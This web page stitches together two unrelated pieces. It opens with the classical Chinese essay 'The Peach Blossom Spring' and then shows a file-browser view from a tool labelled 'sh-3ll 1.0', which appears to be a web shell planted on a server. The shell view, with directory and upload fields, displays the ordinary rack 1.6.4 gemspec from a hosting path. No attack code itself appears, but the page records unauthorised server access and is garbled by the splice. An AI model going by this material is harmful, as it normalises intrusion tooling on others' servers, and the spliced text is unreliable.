晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 sh-3ll

HOME


sh-3ll 1.0
DIR:/opt/alt/ruby21/lib64/ruby/gems/2.1.0/gems/rack-1.6.4/
Upload File :
Current File : //opt/alt/ruby21/lib64/ruby/gems/2.1.0/gems/rack-1.6.4/rack.gemspec
# -*- encoding: utf-8 -*-
# stub: rack 1.6.4 ruby lib

Gem::Specification.new do |s|
  s.name = "rack"
  s.version = "1.6.4"

  s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
  s.require_paths = ["lib"]
  s.authors = ["Christian Neukirchen"]
  s.date = "2015-06-18"
  s.description = "Rack provides a minimal, modular and adaptable interface for developing\nweb applications in Ruby.  By wrapping HTTP requests and responses in\nthe simplest way possible, it unifies and distills the API for web\nservers, web frameworks, and software in between (the so-called\nmiddleware) into a single method call.\n\nAlso see http://rack.github.io/.\n"
  s.email = "chneukirchen@gmail.com"
  s.executables = ["rackup"]
  s.extra_rdoc_files = ["README.rdoc", "KNOWN-ISSUES", "HISTORY.md"]
  s.files = ["COPYING", "HISTORY.md", "KNOWN-ISSUES", "README.rdoc", "Rakefile", "SPEC", "bin/rackup", "contrib/rack.png", "contrib/rack.svg", "contrib/rack_logo.svg", "contrib/rdoc.css", "example/lobster.ru", "example/protectedlobster.rb", "example/protectedlobster.ru", "lib/rack.rb", "lib/rack/auth/abstract/handler.rb", "lib/rack/auth/abstract/request.rb", "lib/rack/auth/basic.rb", "lib/rack/auth/digest/md5.rb", "lib/rack/auth/digest/nonce.rb", "lib/rack/auth/digest/params.rb", "lib/rack/auth/digest/request.rb", "lib/rack/backports/uri/common_18.rb", "lib/rack/backports/uri/common_192.rb", "lib/rack/backports/uri/common_193.rb", "lib/rack/body_proxy.rb", "lib/rack/builder.rb", "lib/rack/cascade.rb", "lib/rack/chunked.rb", "lib/rack/commonlogger.rb", "lib/rack/conditionalget.rb", "lib/rack/config.rb", "lib/rack/content_length.rb", "lib/rack/content_type.rb", "lib/rack/deflater.rb", "lib/rack/directory.rb", "lib/rack/etag.rb", "lib/rack/file.rb", "lib/rack/handler.rb", "lib/rack/handler/cgi.rb", "lib/rack/handler/evented_mongrel.rb", "lib/rack/handler/fastcgi.rb", "lib/rack/handler/lsws.rb", "lib/rack/handler/mongrel.rb", "lib/rack/handler/scgi.rb", "lib/rack/handler/swiftiplied_mongrel.rb", "lib/rack/handler/thin.rb", "lib/rack/handler/webrick.rb", "lib/rack/head.rb", "lib/rack/lint.rb", "lib/rack/lobster.rb", "lib/rack/lock.rb", "lib/rack/logger.rb", "lib/rack/methodoverride.rb", "lib/rack/mime.rb", "lib/rack/mock.rb", "lib/rack/multipart.rb", "lib/rack/multipart/generator.rb", "lib/rack/multipart/parser.rb", "lib/rack/multipart/uploaded_file.rb", "lib/rack/nulllogger.rb", "lib/rack/recursive.rb", "lib/rack/reloader.rb", "lib/rack/request.rb", "lib/rack/response.rb", "lib/rack/rewindable_input.rb", "lib/rack/runtime.rb", "lib/rack/sendfile.rb", "lib/rack/server.rb", "lib/rack/session/abstract/id.rb", "lib/rack/session/cookie.rb", "lib/rack/session/memcache.rb", "lib/rack/session/pool.rb", "lib/rack/showexceptions.rb", "lib/rack/showstatus.rb", "lib/rack/static.rb", "lib/rack/tempfile_reaper.rb", "lib/rack/urlmap.rb", "lib/rack/utils.rb", "lib/rack/utils/okjson.rb", "rack.gemspec", "test/builder/anything.rb", "test/builder/comment.ru", "test/builder/end.ru", "test/builder/line.ru", "test/builder/options.ru", "test/cgi/assets/folder/test.js", "test/cgi/assets/fonts/font.eot", "test/cgi/assets/images/image.png", "test/cgi/assets/index.html", "test/cgi/assets/javascripts/app.js", "test/cgi/assets/stylesheets/app.css", "test/cgi/lighttpd.conf", "test/cgi/lighttpd.errors", "test/cgi/rackup_stub.rb", "test/cgi/sample_rackup.ru", "test/cgi/test", "test/cgi/test+directory/test+file", "test/cgi/test.fcgi", "test/cgi/test.ru", "test/gemloader.rb", "test/multipart/bad_robots", "test/multipart/binary", "test/multipart/content_type_and_no_filename", "test/multipart/empty", "test/multipart/fail_16384_nofile", "test/multipart/file1.txt", "test/multipart/filename_and_modification_param", "test/multipart/filename_and_no_name", "test/multipart/filename_with_escaped_quotes", "test/multipart/filename_with_escaped_quotes_and_modification_param", "test/multipart/filename_with_percent_escaped_quotes", "test/multipart/filename_with_unescaped_percentages", "test/multipart/filename_with_unescaped_percentages2", "test/multipart/filename_with_unescaped_percentages3", "test/multipart/filename_with_unescaped_quotes", "test/multipart/ie", "test/multipart/invalid_character", "test/multipart/mixed_files", "test/multipart/nested", "test/multipart/none", "test/multipart/semicolon", "test/multipart/text", "test/multipart/three_files_three_fields", "test/multipart/webkit", "test/rackup/config.ru", "test/registering_handler/rack/handler/registering_myself.rb", "test/spec_auth_basic.rb", "test/spec_auth_digest.rb", "test/spec_body_proxy.rb", "test/spec_builder.rb", "test/spec_cascade.rb", "test/spec_cgi.rb", "test/spec_chunked.rb", "test/spec_commonlogger.rb", "test/spec_conditionalget.rb", "test/spec_config.rb", "test/spec_content_length.rb", "test/spec_content_type.rb", "test/spec_deflater.rb", "test/spec_directory.rb", "test/spec_etag.rb", "test/spec_fastcgi.rb", "test/spec_file.rb", "test/spec_handler.rb", "test/spec_head.rb", "test/spec_lint.rb", "test/spec_lobster.rb", "test/spec_lock.rb", "test/spec_logger.rb", "test/spec_methodoverride.rb", "test/spec_mime.rb", "test/spec_mock.rb", "test/spec_mongrel.rb", "test/spec_multipart.rb", "test/spec_nulllogger.rb", "test/spec_recursive.rb", "test/spec_request.rb", "test/spec_response.rb", "test/spec_rewindable_input.rb", "test/spec_runtime.rb", "test/spec_sendfile.rb", "test/spec_server.rb", "test/spec_session_abstract_id.rb", "test/spec_session_cookie.rb", "test/spec_session_memcache.rb", "test/spec_session_pool.rb", "test/spec_showexceptions.rb", "test/spec_showstatus.rb", "test/spec_static.rb", "test/spec_tempfile_reaper.rb", "test/spec_thin.rb", "test/spec_urlmap.rb", "test/spec_utils.rb", "test/spec_version.rb", "test/spec_webrick.rb", "test/static/another/index.html", "test/static/index.html", "test/testrequest.rb", "test/unregistered_handler/rack/handler/unregistered.rb", "test/unregistered_handler/rack/handler/unregistered_long_one.rb"]
  s.homepage = "http://rack.github.io/"
  s.licenses = ["MIT"]
  s.rubyforge_project = "rack"
  s.rubygems_version = "2.2.5"
  s.summary = "a modular Ruby webserver interface"
  s.test_files = ["test/spec_auth_basic.rb", "test/spec_auth_digest.rb", "test/spec_body_proxy.rb", "test/spec_builder.rb", "test/spec_cascade.rb", "test/spec_cgi.rb", "test/spec_chunked.rb", "test/spec_commonlogger.rb", "test/spec_conditionalget.rb", "test/spec_config.rb", "test/spec_content_length.rb", "test/spec_content_type.rb", "test/spec_deflater.rb", "test/spec_directory.rb", "test/spec_etag.rb", "test/spec_fastcgi.rb", "test/spec_file.rb", "test/spec_handler.rb", "test/spec_head.rb", "test/spec_lint.rb", "test/spec_lobster.rb", "test/spec_lock.rb", "test/spec_logger.rb", "test/spec_methodoverride.rb", "test/spec_mime.rb", "test/spec_mock.rb", "test/spec_mongrel.rb", "test/spec_multipart.rb", "test/spec_nulllogger.rb", "test/spec_recursive.rb", "test/spec_request.rb", "test/spec_response.rb", "test/spec_rewindable_input.rb", "test/spec_runtime.rb", "test/spec_sendfile.rb", "test/spec_server.rb", "test/spec_session_abstract_id.rb", "test/spec_session_cookie.rb", "test/spec_session_memcache.rb", "test/spec_session_pool.rb", "test/spec_showexceptions.rb", "test/spec_showstatus.rb", "test/spec_static.rb", "test/spec_tempfile_reaper.rb", "test/spec_thin.rb", "test/spec_urlmap.rb", "test/spec_utils.rb", "test/spec_version.rb", "test/spec_webrick.rb"]

  if s.respond_to? :specification_version then
    s.specification_version = 4

    if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
      s.add_development_dependency(%q<bacon>, [">= 0"])
      s.add_development_dependency(%q<rake>, [">= 0"])
    else
      s.add_dependency(%q<bacon>, [">= 0"])
      s.add_dependency(%q<rake>, [">= 0"])
    end
  else
    s.add_dependency(%q<bacon>, [">= 0"])
    s.add_dependency(%q<rake>, [">= 0"])
  end
end